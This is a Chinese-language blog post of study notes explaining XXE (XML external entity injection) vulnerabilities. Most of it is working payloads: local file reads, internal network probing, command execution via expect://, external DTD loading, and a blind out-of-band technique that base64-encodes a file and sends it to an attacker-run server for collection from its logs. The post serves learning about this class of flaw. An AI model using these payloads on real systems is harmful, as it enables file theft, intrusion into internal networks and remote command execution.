当前位置:网站首页>XXE&XML 漏洞
XXE&XML 漏洞
2022-07-27 05:04:00 【weixin_53150482】
每周学习总结链接
我记得之前有一个关卡是这个漏洞,但是我忘了
一、XXE 漏洞
XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。
在实际中我们可能不知道怎么发现这个漏洞,其实很简单只需要抓个包看看数据的样式是不是 XML 语法即可
二、XML 的学习
对于这个实在没有讲的,你要是这个都不会,我对你的能力表示怀疑
三、DTD
这个我之前学开发的时候,没有见过,建议看看,
文章链接
四、攻击思路
读文件
<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///d://test.txt"> ]> <x>&xxe;</x>内网探针或攻击内网应用(触发漏洞地址)
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY rabbit SYSTEM "http://192.168.0.103:8081/index.txt" > ]> <x>&rabbit;</x>RCE 该 CASE 是在安装 expect 扩展的 PHP 环境里执行系统命令
<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "expect://id" > ]> <x>&xxe;</x>引入外部实体 dtd
<?xml version="1.0" ?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd"> %file; ]> <x>&send;</x> evil2.dtd: <!ENTITY send SYSTEM "file:///d:/test.txt">无回显–读取文件
<?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=test.txt"> <!ENTITY % dtd SYSTEM "http://远程:8081/test.dtd"> %dtd; %send; ]>在自己服务器上创建相应文件,使目标服务器访问自己服务器,从日志查看信息
test.dtd:<!ENTITY % payload "<!ENTITY % send SYSTEM 'http://192.168.0.103:8081/?data=%file;'>" > %payload;协议-读文件(绕过)
<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]> <x>&f;</x>
总结
边栏推荐
猜你喜欢
随机推荐
退出登录与jsx显示
JS中forEach和map方法有什么区别
Makefile is easy to understand and explain
初识C语言——常量、变量
【codeforces 1695C Zero Path】DP
分享一道关于程序编译过程的选择题(内含编译过程浅谈,符号表的形成合并过程)
小米商城项目_注册
Gallerycms download, installation and configuration
一本通顺序结构程序设计题解(第一章)
页面的配置
Package JWT
JS中什么是DOM和BOM
Time complexity and space complexity
初识C语言——为什么每个C程序都有一个main函数
Carmaker quick start lesson 4 developing 48V P1 hybrid system
页面布局中元素定位的几种方式
[C language switch branch statement and loop statement]
洛谷超级玛丽游戏
C language makes a small maze
Promise的理解,以及它的实例方法



![[极客大挑战 2019]FinalSQL 1](/img/a7/857d47639fcb38e0055a2444206b8c.png)




